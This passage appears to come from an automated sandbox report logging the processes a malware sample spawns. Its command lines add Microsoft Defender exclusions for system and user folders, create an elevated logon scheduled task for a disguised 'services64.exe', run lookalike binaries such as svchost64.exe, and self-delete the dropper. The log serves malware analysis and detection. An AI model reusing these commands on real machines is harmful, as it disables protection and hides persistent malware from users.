                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:127
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:128
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\choice.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                                                                                                                Imagebase:0x7ff62e2e0000
                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:129
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:130
                                                                                                                                                                Start time:11:42:41
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:131
                                                                                                                                                                Start time:11:42:43
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
Has exited:true

Target ID:132
Start time:11:42:43
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:133
Start time:11:42:43
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:134
Start time:11:42:44
Start date:27/09/2024
Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):false
Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Imagebase:0x7ff788560000
File size:452'608 bytes
MD5 hash:04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:135
Start time:11:42:44
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:136
Start time:11:42:45
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:137
Start time:11:42:46
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:138
Start time:11:42:46
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:139
Start time:11:42:46
Start date:27/09/2024
Path:C:\Users\user\AppData\Local\Temp\svchost64.exe
Wow64 process (32bit):false
Commandline:C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
Imagebase:0x5e0000
File size:38'400 bytes
MD5 hash:A8638A5105C9A663B0D6918D64B3AD21
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:140
Start time:11:42:46
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:141
Start time:11:42:46
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:142
Start time:11:42:47
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
Imagebase:0x7ff7067d0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:143
Start time:11:42:47
Start date:27/09/2024
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff7699e0000
File size:862'208 bytes
MD5 hash:0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:144
Start time:11:42:47
Start date:27/09/2024
Path:C:\Windows\System32\Microsoft\Libs\sihost64.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Imagebase:0x370000
File size:7'680 bytes
MD5 hash:7112FD4E6B2CDD13C11B8B04A96769CB
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:145
Start time:11:42:47
Start date:27/09/2024
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Imagebase:0x7ff76f990000
File size:235'008 bytes
MD5 hash:76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Has exited:true

Target ID:146
Start time:11:42:48
Start date:27/09/2024
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\cmd.exe" /c C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:147
                                                                                                                                                                Start time:11:42:48
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:148
                                                                                                                                                                Start time:11:42:48
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:149
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Users\user\AppData\Local\Temp\svchost64.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Users\user\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"
                                                                                                                                                                Imagebase:0x410000
                                                                                                                                                                File size:38'400 bytes
                                                                                                                                                                MD5 hash:A8638A5105C9A663B0D6918D64B3AD21
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:150
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:151
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:152
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\choice.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                                                                                                                Imagebase:0x7ff62e2e0000
                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:153
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:154
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:155
                                                                                                                                                                Start time:11:42:49
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:156
                                                                                                                                                                Start time:11:42:50
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:157
                                                                                                                                                                Start time:11:42:50
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 158
Start time: 11:42:50
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 159
Start time: 11:42:50
Start date: 27/09/2024
Path: C:\Windows\System32\Microsoft\Libs\sihost64.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\system32\Microsoft\Libs\sihost64.exe"
Imagebase: 0x380000
File size: 7'680 bytes
MD5 hash: 7112FD4E6B2CDD13C11B8B04A96769CB
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 160
Start time: 11:42:51
Start date: 27/09/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 161
Start time: 11:42:51
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 162
Start time: 11:42:51
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 163
Start time: 11:42:52
Start date: 27/09/2024
Path: C:\Windows\System32\schtasks.exe
Wow64 process (32bit): false
Commandline: schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'
Imagebase: 0x7ff76f990000
File size: 235'008 bytes
MD5 hash: 76CD6626DD8834BD4A42E6A565104DC2
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 164
Start time: 11:42:52
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 165
Start time: 11:42:52
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 166
Start time: 11:42:53
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 167
Start time: 11:42:54
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 168
Start time: 11:42:54
Start date: 27/09/2024
Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit): false
Commandline: powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Roaming'
Imagebase: 0x7ff788560000
File size: 452'608 bytes
MD5 hash: 04029E121A0CFA5991749937DD22A1D9
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 169
Start time: 11:42:54
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\user\AppData\Local\Temp\svchost64.exe"
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 170
Start time: 11:42:55
Start date: 27/09/2024
Path: C:\Windows\System32\conhost.exe
Wow64 process (32bit): false
Commandline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase: 0x7ff7699e0000
File size: 862'208 bytes
MD5 hash: 0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 171
Start time: 11:42:55
Start date: 27/09/2024
Path: C:\Windows\System32\cmd.exe
Wow64 process (32bit): false
Commandline: "C:\Windows\System32\cmd.exe" /c
Imagebase: 0x7ff7067d0000
File size: 289'792 bytes
MD5 hash: 8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges: true
Has administrator privileges: true
Programmed in: C, C++ or other language
Has exited: true

Target ID: 172
Start time: 11:42:55
Start date: 27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:173
                                                                                                                                                                Start time:11:42:55
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\choice.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:choice /C Y /N /D Y /T 3
                                                                                                                                                                Imagebase:0x7ff62e2e0000
                                                                                                                                                                File size:35'840 bytes
                                                                                                                                                                MD5 hash:1A9804F0C374283B094E9E55DC5EE128
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:174
                                                                                                                                                                Start time:11:42:55
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:175
                                                                                                                                                                Start time:11:42:55
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:176
                                                                                                                                                                Start time:11:42:56
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:177
                                                                                                                                                                Start time:11:42:56
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:178
                                                                                                                                                                Start time:11:42:56
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:179
                                                                                                                                                                Start time:11:42:56
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:180
                                                                                                                                                                Start time:11:42:57
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:"C:\Windows\System32\cmd.exe" /c
                                                                                                                                                                Imagebase:0x7ff7067d0000
                                                                                                                                                                File size:289'792 bytes
                                                                                                                                                                MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:181
                                                                                                                                                                Start time:11:42:57
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                Imagebase:0x7ff7699e0000
                                                                                                                                                                File size:862'208 bytes
                                                                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
                                                                                                                                                                Programmed in:C, C++ or other language
                                                                                                                                                                Has exited:true

                                                                                                                                                                Target ID:182
                                                                                                                                                                Start time:11:42:58
                                                                                                                                                                Start date:27/09/2024
                                                                                                                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                Wow64 process (32bit):false
                                                                                                                                                                Commandline:powershell -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp'
                                                                                                                                                                Imagebase:0x7ff788560000
                                                                                                                                                                File size:452'608 bytes
                                                                                                                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                                                                                                                Has elevated privileges:true
                                                                                                                                                                Has administrator privileges:true
